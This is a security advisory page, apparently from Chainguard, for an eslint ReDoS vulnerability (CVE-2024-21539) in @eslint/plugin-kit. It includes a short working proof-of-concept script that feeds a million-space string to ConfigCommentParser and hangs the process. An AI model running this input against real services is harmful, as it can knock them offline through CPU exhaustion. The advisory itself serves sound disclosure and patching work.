DirectorySecurity Advisories
Sign In
Security Advisories

CGA-v55f-9838-wrpj

Published

Last updated

https://images.chainguard.dev/security/CGA-v55f-9838-wrpj
Package

eslint

Latest Update
Fixed
Fixed Version

9.15.0-r0

Aliases
  • CVE-2024-21539
  • GHSA-7q7g-4xm8-89cq

Severity

3.5

Low

CVSS V3

Summary

Regular Expression Denial of Service (ReDoS) in @eslint/plugin-kit

Description

Crafting a very large and well crafted string can increase the CPU usage and crash the program.

POC

const { ConfigCommentParser } = require("@eslint/plugin-kit");

var str = "";
for (var i = 0; i < 1000000; i++) {
  str += " ";
}
str += "A";

console.log("start")
var parser = new ConfigCommentParser();
console.log(parser.parseStringConfig(str, ""));
console.log("end")

// run `npm i @eslint/plugin-kit` and `node attack.js` 
// then the program will stuck forever with high CPU usage

References

Updates


Safe Source for Open Sourceâ„¢
Media KitContact Us
© 2024 Chainguard. All Rights Reserved.
Private PolicyTerms of Use

Product

Chainguard Images